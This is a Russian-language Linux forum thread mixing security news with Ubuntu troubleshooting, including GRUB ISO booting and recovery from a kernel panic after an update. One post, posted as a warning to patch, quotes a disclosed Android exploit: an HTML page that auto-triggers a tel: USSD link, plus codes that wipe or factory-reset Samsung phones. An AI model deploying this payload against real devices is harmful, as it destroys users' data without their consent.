Опасности для пингвинов, их мало, но бывают |
Здравствуйте, гость ( Вход | Регистрация )
Опасности для пингвинов, их мало, но бывают |
17.3.2011, 8:58
Сообщение
#1
|
|
шаражник по жизни, рядовой Группа: недомод :) Сообщений: 5484 Регистрация: 24.11.2009 Из: Россия, Челябинская область Пользователь №: 26 |
Цитата http://www.opennet.ru/opennews/art.shtml?num=29834 Взлом Linux через подключение USB-устройства стал реальностью 08.03.2011 11:31 В USB-драйвере caiaq найдена уязвимость, позволяющая инициировать переполнение буфера и выполнение кода злоумышленника через подключение специально сконфигурированного USB-устройства к работающему под управлением Linux компьютеру. Используя данную уязвимость, злоумышленник может воспользоваться имеющимися в продаже недорогими программируемыми USB-платами для организации выполнения своего кода c правами ядра Linux в любой системе к USB-порту которой он может получить доступ. Приводящая к уязвимости ошибка представляет собой наиболее тривиальный вариант инициирования переполнения буфера, связанный с использованием для копирования содержимого строки небезопасной функции strcpy(), вместо учитывающего длину строки варианта strlcpy(). Эксплуатировать уязвимость можно через передачу превышающего 80 символов имени устройства в процессе обмена информацией на стадии инициализации. Для создания устройства можно использовать отладочные USB-платы на базе микроконтроллеров серии AT90USB или ATMEGA32U4, стоимость которых составляет приблизительно 20$. Именно эти платы в прошлом году использовались для организации взлома Sony PlayStation 3 через USB-порт. Приводящая к уязвимости ошибка была исправлена в коде ядра в середине февраля. Исправления вошли в состав ядер 2.6.37.2 и 2.6.38-rc4-next-20110215. В выпущенном вчера обновлении ядра 2.6.32.32 присутствует исправление похожей ошибки в USB-драйвере iowarrior, поэтому не исключено, что в ближайшее время можно ожидать анонс уязвимости и в других драйверах. В качестве временной защиты рекомендуется удалить из системы драйверы /lib/modules/2.6.*/kernel/sound/usb/caiaq/snd-usb-caiaq.ko и /lib/modules/2.6.*/kernel/drivers/usb/misc/iowarrior.ko. Опасность, скорее, теоретическая. Но, на серверах я бы грохнул указанные модули. К чему на серваках драйверы USB-звуковух? |
|
|
18.3.2011, 10:02
Сообщение
#2
|
|
ЕРЖ-антисемит Группа: Пользователи Сообщений: 1900 Регистрация: 24.11.2009 Из: Великий Новгород Пользователь №: 23 |
На сервере звук не нужен. Но, видимо, есть особо одарённые, которые используют.
|
|
|
19.3.2011, 2:33
Сообщение
#3
|
|
шаражник по жизни, рядовой Группа: недомод :) Сообщений: 5484 Регистрация: 24.11.2009 Из: Россия, Челябинская область Пользователь №: 26 |
Опять ымбеддеры? Танунах! Какие Ымбеддеры... В этом случае, или очень уставшие люди ("глаз замылился"), или попросту, обычные распиздяи. Ещё ж в школе всех учили -- "насрал -- убери за собой" и "всегда контролируй длину ствола". А сейчас пока -- чик по драйверу и ага -- "в колодце она лежит, сходи посмотри."© --- Поломают и Linux (но, не каждый). Была бы задача поставлена. "Что у хорошего шофёра ржавеет, а у плохого блестит?"© Так и здесь. |
|
|
10.6.2012, 22:18
Сообщение
#4
|
|
тот самый Группа: Мод Сообщений: 13629 Регистрация: 24.11.2009 Из: Харьковская обл., UA Пользователь №: 25 |
Тут такая штука.
Убунта 12.04 на нетбуке Слишком часто слышу чудные звуки парковки головок винта - раз секунд в 3-5 Когда-то читаль про старую проблему убиения винтов из-за частой парковки, стал подозревать рецидив тсз. Кто-нибудь может ткнуть носом в обсуждение проблемы (ключевых слов не помню)? Или это поцыкивание все-же в пределах нормы? Спасибо! |
|
|
11.6.2012, 10:49
Сообщение
#5
|
|
Активный участник Группа: Пользователи Сообщений: 93 Регистрация: 3.5.2011 Пользователь №: 357 |
Тут такая штука. Убунта 12.04 на нетбуке Слишком часто слышу чудные звуки парковки головок винта - раз секунд в 3-5 Когда-то читаль про старую проблему убиения винтов из-за частой парковки, стал подозревать рецидив тсз. Кто-нибудь может ткнуть носом в обсуждение проблемы (ключевых слов не помню)? Или это поцыкивание все-же в пределах нормы? Спасибо! ИМХО умрёт быстрее, но больше всего это просто раздражает. Надо установить значение APM на 128 или выше, под винду есть простенькие программки для этого, про пингвинофф в гугле пишут http://pingvinoff.net/2011/08/01/saving-hd...-laptop-part-2/ |
|
|
11.6.2012, 19:36
Сообщение
#6
|
|
тот самый Группа: Мод Сообщений: 13629 Регистрация: 24.11.2009 Из: Харьковская обл., UA Пользователь №: 25 |
|
|
|
26.7.2012, 15:56
Сообщение
#7
|
|
шаражник по жизни, рядовой Группа: недомод :) Сообщений: 5484 Регистрация: 24.11.2009 Из: Россия, Челябинская область Пользователь №: 26 |
Ахтунг!
*nix-ы тоже могут попасть. Кросс-платформенный троянец берет под контроль «маки» и компьютеры на базе Windows |
|
|
Гость_MrYuran_* |
26.7.2012, 18:31
Сообщение
#8
|
Гости |
Зарегился в Ubuntu One, теперь я тоже в облаках
Осталось купить убунтофон -или пад, и будем не хуже других. |
|
|
27.7.2012, 4:45
Сообщение
#9
|
|
Активный участник Группа: Пользователи Сообщений: 704 Регистрация: 20.2.2011 Из: Новосибирск Пользователь №: 337 |
а опосля регигстрации на убунтуоне на ланчпад пускает по тому же логину-паролю?
т еще, я что-то не нашел, он селективный синк поддерживает? |
|
|
22.8.2012, 17:43
Сообщение
#10
|
|
шаражник по жизни, рядовой Группа: недомод :) Сообщений: 5484 Регистрация: 24.11.2009 Из: Россия, Челябинская область Пользователь №: 26 |
Очередной ахтунг!
Цитата http://www.cnews.ru/top/2012/08/22/obnaruz...y_paroli_500198 Обнаружен первый троянец для Linux и Mac OS X, похищающий пароли 22.08.12, Ср, 16:30, Мск А если на /home подвесить noexec? т.е. 0600 |
|
|
21.9.2012, 16:27
Сообщение
#11
|
|
шаражник по жизни, рядовой Группа: недомод :) Сообщений: 5484 Регистрация: 24.11.2009 Из: Россия, Челябинская область Пользователь №: 26 |
Оставлю-ка я это здесь.
Может, когда, кому пригодится. О том, "как самому себя вытянуть из болота за волосы". На примере Ubuntu 11.04 + Grub2. Когда станцию строил, ничего более интересного не было (кроме Debian, но он мне не подошёл по паре параметров). --- Сегодня утром, в непривычной суете и суматохе, грубо нарушил старинное правило: Цитата Никогда не накатывай обновления в понедельник и в пятницу. Особенно, не посмотрев, что там в апдейтах прилетело и не вникнув в их суть. Прилетели утром через "менеджер обновлений" следующие пакеты: Цитата dbus_1.4.6-1ubuntu6.2_amd64.deb dbus-x11_1.4.6-1ubuntu6.2_amd64.deb libdbus-1-3_1.4.6-1ubuntu6.2_amd64.deb libdbus-1-dev_1.4.6-1ubuntu6.2_amd64.deb после установки которых потребовалась перезагрузка. После чего, при загрузке системы, вскрылась засада: Цитата No filesystem could mount root, tried: ext3 ext2 ext4 fuseblk Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block (0,0) Pid:1, comm: swapper Not tained 2.6.38-16-generic #67-Ubuntu Далее, естественно, последовала остановка компьютера. А станция нужна была... только-только рабочий день начинался и традиционная туча звонков, вопросов, просьб, задач. Пришлось грузиться при помощи Grub с установочного iso-шника, смотреть логи и пытаться понять проблему. Посмотрел содержание вновь полученных deb-пакетов, посмотрел изменённые файлы. Почему-то в /etc/fstab пропала запись с UUID и вместо неё появилась строка в старом формате /dev/sda5. Переписал, как надо. Далее выполнил: Цитата $ sudo mount /dev/sda2 /mnt ---> это "root" раздел в упавшей системе $ sudo mount /dev/sda1 /mnt/boot $ sudo mount /dev/sda5 /mnt/tmp $ sudo mount /dev/sda6 /mnt/var $ sudo mount /dev/sda7 /mnt/usr $ sudo mount --bind /dev/ /mnt/dev $ sudo mount --bind /proc/ /mnt/proc $ sudo chroot /mnt $ sudo update-initramfs -u Загрузил систему в "режиме восстановления" и выполнил: Цитата $ sudo update-grub Загрузил систему в обычном режиме. Всё пучком. Возможно (?), после установки обновлений не было автоматически выполнено Цитата # update-initramfs Причину косяка я не понял, не было времени. О главном. Оно меня сегодня здорово выручило. Когда: -- в станции (или ноуте) нет CD-DVD-привода, -- или когда нет нарезанного сидюка с LiveCD, -- или когда есть *.iso, но нет под рукой пустой матрицы, -- или когда записать *.iso на матрицу нечем, -- или просто лень этим заниматься, -- или нет в сети tftp сервера с настроенной nfs (или лень конфигурить), может выручить загрузка с *.iso через Grub2 (если, конечно, он живой). Правда, для этого предварительно (до возникновения проблем) надо о себе позаботиться. Описана эта процедура во многих местах, но у нас, вроде, не было. 1) при установке системы желательно создать отдельный раздел /boot 2) в разделе /boot создать каталог, допустим, iso (чтобы в него можно было напихать разных iso-шников, на все случаи жизни -- PartedMagic, DEFT & etc и не мусорить в корне) 3) в /boot/iso скопировать файл ubuntu-11.04-desktop-amd64.iso 4) в /etc/grub.d/40_custom прописать: Цитата menuentry "ISO - Ubuntu-11.04-desktop-amd64" { loopback loop (hd0,1)/iso/ubuntu-11.04-desktop-amd64.iso set root=(loop) linux (loop)/casper/vmlinuz boot=casper iso-scan/filename=/iso/ubuntu-11.04-desktop-amd64.iso noprompt noeject initrd (loop)/casper/initrd.lz } (hd0,1) "0" -- мой загрузочный диск "1" -- первый раздел на диске -- мой раздел /boot после внесения изменений в /etc/grub.d/40_custom выполнить: Цитата $ sudo update-grub При загрузке в меню Grub2 появится новый пункт "ISO - Ubuntu-11.04-desktop-amd64". |
|
|
21.9.2012, 19:36
Сообщение
#12
|
|
Активный участник Группа: Пользователи Сообщений: 704 Регистрация: 20.2.2011 Из: Новосибирск Пользователь №: 337 |
Доброго здравия! Надо у себя тоже iso-шник положить, спасиббо за наводку.
Кстати, сегодня обновился, вроде тьфу-тьфу все хорошо, вообще 12.04 меня поражает своей стабильность ) после предыдущих версий |
|
|
26.9.2012, 5:46
Сообщение
#13
|
|
шаражник по жизни, рядовой Группа: недомод :) Сообщений: 5484 Регистрация: 24.11.2009 Из: Россия, Челябинская область Пользователь №: 26 |
Внимание, у кого смарты с Андроидом!
Серьёзный баг на днях расковыряли. Попасть в засаду можно просто сфотографировав QR-код. Необходимо накатить патчи (если кто-то кроме Samsung их выпустил). Цитата http://habrahabr.ru/post/152209/ На конференции по безопасности продемонстрировали, как одной строкой HTML кода можно удаленно удалить данные с Samsung Galaxy S III. Хуже всего: это, кажется, работает на многих смартфонах Samsung с TouchWiz Данные эксплойт в виде строки HTML кода также может быть вызвать через встроенный сканер QR кодов или NFC. <...> HTC One X тоже уязвим. Только что на своем проверил. <...> HTC hero c 2.1, HTC Tattoo с 1.6, HTC Desire и так далее Цитата <html> <head> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.1/jquery.min.js"></script> </head> <body> <a onclick="document.location='tel:*%2306%23'" id="link" />Call me</a> <script> $(document).ready(function() { $('#link').click(); }); </script> </body> </html> Цитата tel:*%2306%23 -- запрос IMEI tel: *#*#7780#*#* -- wipe tel: *#767*3855# -- форматирование разделов tel: *2767*3855# — Полный сброс IEEPROM ( Этот код удаляет SP-блокировку!) Но также изменяет IMEI на 447967-89-400044-0 --- Цитата http://habrahabr.ru/post/152209/#comment_5171865 Выходит любой ussd запрос можно без запроса пользователя отправить — «хороший» способ для подписки к «нужным» мобильным услугам… |
|
|
26.9.2012, 7:12
Сообщение
#14
|
|
тот самый Группа: Мод Сообщений: 13629 Регистрация: 24.11.2009 Из: Харьковская обл., UA Пользователь №: 25 |
Цитата tel: *#*#7780#*#* -- wipe Что такое wipe? *** Сейчас пошла волна убунтовых обновлений, которая повергает меня в тоску. Перезагрузился - отвалился wifi - оказалось, видимо, кто-то решил, что если в setup'е установлено при старте "always off", то связь запрещена вообще и включить позже ее хоткеем невозможно. |
|
|
26.9.2012, 7:20
Сообщение
#15
|
|
шаражник по жизни, рядовой Группа: недомод :) Сообщений: 5484 Регистрация: 24.11.2009 Из: Россия, Челябинская область Пользователь №: 26 |
|
|
|
26.9.2012, 13:16
Сообщение
#16
|
|
Активный участник Группа: Пользователи Сообщений: 704 Регистрация: 20.2.2011 Из: Новосибирск Пользователь №: 337 |
Что такое wipe? *** Сейчас пошла волна убунтовых обновлений, которая повергает меня в тоску. Перезагрузился - отвалился wifi - оказалось, видимо, кто-то решил, что если в setup'е установлено при старте "always off", то связь запрещена вообще и включить позже ее хоткеем невозможно. А какая версия? у меня 1204 железно работает уже как полгода без всяких смертельных глюков |
|
|
26.9.2012, 13:20
Сообщение
#17
|
|
тот самый Группа: Мод Сообщений: 13629 Регистрация: 24.11.2009 Из: Харьковская обл., UA Пользователь №: 25 |
|
|
|
26.9.2012, 14:03
Сообщение
#18
|
|
Активный участник Группа: Пользователи Сообщений: 704 Регистрация: 20.2.2011 Из: Новосибирск Пользователь №: 337 |
У меня unity, из самых страшных глюков - очень редко, всего два-три раза было не подгружались виртуалбоксовские модули после обновлений, делал вручную или перезагрузкой. Правда различого софта у меня не сильно много установлено. Но сейчас. в командировке, стараюсь не обновляться от греха подальше
|
|
|
29.9.2012, 16:42
Сообщение
#19
|
|
тот самый Группа: Мод Сообщений: 13629 Регистрация: 24.11.2009 Из: Харьковская обл., UA Пользователь №: 25 |
Поломался десктоп, тот что xfce. Кто знает, как его быстро и аккуратно вычистить и обновить? Установки/переустановки не помогают. Уже подумываю, а не перезалить ли не всё по новой... Это все обновления, блин.
|
|
|
29.9.2012, 18:57
Сообщение
#20
|
|
тот самый Группа: Мод Сообщений: 13629 Регистрация: 24.11.2009 Из: Харьковская обл., UA Пользователь №: 25 |
Блять!!! Перезалил десктоп полностью xubuntu.
Заработало. Цитата Никогда не накатывай обновления в понедельник и в пятницу. Истина. Я вчера мучался с отладчиком для STM32, понаставлял в горячке, видать, чего-то. |
|
|
Текстовая версия | Сейчас: 28.3.2024, 23:22 |